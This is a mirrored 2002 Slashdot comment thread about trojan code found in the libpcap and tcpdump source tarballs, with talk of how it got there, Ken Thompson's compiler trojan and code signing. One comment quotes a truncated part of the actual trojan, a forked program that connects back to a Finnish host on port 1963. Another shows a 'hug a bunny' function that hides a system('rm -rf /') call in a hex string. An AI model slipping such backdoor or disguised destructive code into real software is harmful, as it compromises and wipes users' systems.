Slashdot Mirror
Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get accsess to _any_ unix system.
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
The program connects to 212.146.0.34 (mars.raketti.net) on port 1963
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
-- 7 string electric violin + live loop samplers
This never used to happen. Now it is like as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.
Either that or someone has trojaned (is that a word?) his site!
The tojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
From excellent karma to terible karma with a single +5 funny post...
That's good if you can assure that the MD5 checksum is for the original tarball. What if the guy who placed the torjan placed a new MD5 checksum as well?
Any fool can talk, but it takes a wise man to listen.
How did it get into tcpdump.org's sources exactly?
Presumably the tcpdump.org FTP server got 0wned, and the trojan was planted, but the people that found the trojan aren't the server admins - they just found it in the source they downloaded. And I doubt we will find out how the perpetrators got in, either. It would have been nice to find out in more detail what happened when the OpenBSD FTP server was compromised, but people are usually tight-lipped in these cases.
-- Never hit a man with glasses. Hit him with a baseball bat.
Personally I've seen many backdoors in closes source software, even more, as a programmer years ago, I was instructed to put backdoors on Banking software by my employer and the bank auditing team. And let me tell you that the security was so bad that I personally switched my bank account from that institution to another.
I don't think the only irrelevant comment is thinking that bad things(r) happens only in one place. Like I said, on open source software, I Can Audit Myself The Code.
This argument can of course be reversed: Because sources are open, one can insert trojans.
So there's no point mentioning it.
The point is: When was the specific change added? By whom? The maintainer should know. Let us know. Then put the person who sent in the patch with the trojan in a black list so his/her future patches to open source programs are first severely checked, if accepted at all.
That's more like it -I think-.
I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accoutability when someone intentionally codes a trojan in to a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?
Buy the President
that's not true, look at it again ...
/. eats this code post ... ):
/dev/null 1>/dev/null
in the middle of the fuly commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh
Very Offtopic...
1963 - Assasination of President Kennedy
The Other Nate
An AC wrote:
m l
> closed src doesn't have its src on some
> webserver for some kiddie to trojan in the first
> place. sure the possibility of some employee or
> the employer itself to trojan the src, but most
> open source trojans are someone breaking into
> the web server and uploading modified src. by
> definition this wont happen with closed src
> since closed src doesn't release src, so your
> argument is irrelevant.
Oh, no? Look here:
http://news.zdnet.co.uk/story/0,,s2082221,00.ht
Microsoft had their source available to some cracker for three months back in 2000. Of course they later spun it down to "one day and we were watching them all the time".
Point is, closed source can be vunerable too. Only Microsoft knows if any damage was really done, and they aren't telling us squat.
"At this moment, it has control of systems all over the world.
And...we can't do a damn thing to stop it."
Miyasaka, "Godzilla 2000 Millennium" (Japanese version)
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..
The source could still be publically available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Give a hand, not a hand-out.
Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.
Maybe someone ran arbitrary code on the webserver.
Don't think for a second that Microsoft hasn't put back
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.
To ensure perfect aim, shoot first and call whatever you hit the target
We need to come together and paaaaaarty! :-)
Really, that's the only solution to this problem. Probably, this is something we are going to see more frequently, so frequently perhaps that it may undermine the free software community's credibility. Therefore, we must come together and meet, and exchange signatures, so that at least we can ensure that they software is signed by its maintainer.
Now, go and get registered at Biglumber, sign up to the keysignings list and start organizing keysigning parties. Also, make sure that you meet other hackers when you're out travelling.
Employee of Inrupt, Project Release Manager and Community Manager for Solid
Bruce
Bruce Perens.
Bruce
Bruce Perens.
but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
How hard is it to write code that appears to do something friendly, but actually does something really nasty? Consider this appearantly friendly code: // Bunny ID
// Hugs the bunny specified by 'bunny'
/"
#define hug system
const char* bunny = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 };
void hug_a_bunny() {
hug(bunny);
}
Hint: bunny evaluates to "rm -rf
The world will end in 5 minutes. Please log out.
The mirrors contained the trojan as well.
./configure && make? This is certainly a case for running builds in a systrace jail.
Besides, this is an exploit of trust, no operating system is any more vulnerable than any other. Binary distributions would only contain the libpcap backdoor to ignore tcp port 1963, the actual trojan appears in the configure script.
How many times have you downloaded sources and blindly ran
For the record, this fits the modus operandi of trojans found in irssi, fragroute, dsniff, BitchX, OpenSSH, and sendmail.
Let's acknowledge the reason we have phrases like "trojan" and "virus" in respect to computer software. Each of them describes a different type of malicious code. At the least it's disingenous to claim that a virus "inserts a trojan". To put it more accurately, it's just flat out wrong to claim that a virus trojans (sic) a binary with a copy of itself.
Using the language the way you are is many times worse than using phrases like "pirate" to describe a criminal and civil rights violator. Or using "hacker" v. "cracker".
Nedward
Yeah... my servers front end my home network, so they are turned on 24/7 and right now are connected through redundant DSL connections to the Internet. So mine make a somewhat attractive target.
Since I am basically a lazy sysadmin, my approach had been to use really obscure hardware for my server. To accomplish that I bought a Rebel Netwinder on the theory that any exploit out for x86 would probably take months to be ported to the StrongARM (the StrongARM instruction set is both restrictively small, and completely anal about non-aligned memory accesses, so hand-coded assembly is a pain to write if you are trying to take advantage of a stack overflow of some kind.)
Recently I've swapped the rebel box for another Intel server, this time running RH7.3, and I bought a subscription to RHN to keep it up to date. Since RHN manages all of the security updates and dependencies, all I have to do is log on once a week or so and request the updates. So now I get to be lazy in two regards; first it is much easier to add new software (StrongARM porting being not my cup of tea), and secondly RHN takes care of the security updates.
I imagine that Debian users would argue likewise for apt-get.
LibBT: BitTorrent for C - small - fast - clean (Now Versio
Oops, forgot to answer that. I did log on to IRC and tracked down a couple of the users listed in the eggdrop config files. The original channel was no longer active, but there were a few people with the same IDs logged in on another channel; but the channel content was so spooky that it kind of freaked me out at the time. For about five minutes the only thing in the channel were various people sending messages like 'CCs', or 'eggable accts'. Then suddenly some guy posted a message saying approximately: 'so and so is a lousy copier', then 'I may as well give this out as a freebie since I don't want him to get all the use of it', followed by some guy's name, address, SSN, phone, and credit card numbers.
At that point I decided I was in the middle of things I didn't want to be in. I did call the person to let them know that his credit card information had been stolen, and to watch his receipts, but basically dropped it there. As far as I know the FBI only cares about computer hacking if there has been at least $1k of damage. I had about a day to rebuild my server (before replacing it a month later with the Rebel), but nothing close to $1k; no deleted files or anything.
I did track down the person's Nick which basically turned into a Google search, but since he'd been using that Nick for a long time and in many different places, it was very easy to do. The Nick seemed to belong to a student at UCB, previously a student in Singapore, but the evidence was pretty loose, and in any case I doubt I could have done more than make a few legal threats. Ultimately I decided to chalk it all down as a learning experience and let it go (but I still have the backup tapes of the hacked machine if I ever need them.)
Handing out other peoples passwords wouldn't have been possible. Eggdrop stores them in encrypted form so even with the contents of the password file there wasn't anything I could do to retrieve their plain text passwords.
LibBT: BitTorrent for C - small - fast - clean (Now Versio
Hmm... I don't know anything about this eggdrop software, but couldn't someone hack it, remove the encryption algorithms on the passwords, run an IRC client, advertise it as a cracked machine on the relevant IRC channels, etc.R
Essentially setting up a honeypot to capture hacker login/pw combinations to later track activity, etc? If the honeypot were configured well, I would imagine you could trick them into giving away quite a bit.